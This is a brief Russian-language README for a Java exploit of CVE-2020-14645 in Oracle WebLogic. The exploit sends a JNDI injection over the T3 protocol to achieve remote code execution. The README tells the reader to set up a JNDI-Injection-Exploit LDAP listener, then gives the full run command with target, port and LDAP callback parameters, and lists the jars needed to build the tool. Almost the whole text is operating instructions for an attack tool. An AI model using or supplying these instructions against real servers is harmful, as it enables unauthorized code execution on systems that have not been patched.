
Эксплойт на Java для CVE-2020-14645, нацеленный на протокол T3 Oracle WebLogic с использованием JNDI-инъекции для удаленного выполнения кода.
Сначала используйте NDI-Injection-Exploit для прослушивания и генерации ldap-адреса.
java -jar WeblogicT3.jar -Target 127.0.0.1 -Port [7001] -RMI ldap://127.0.0.1:1389/dozvtq [--SSL]
-Tatget и -RMI обязательны, для https можно использовать параметр --SSL, -Port по умолчанию 7001.
Для самостоятельной компиляции необходимо добавить coherence.jar и wlfullclient.jar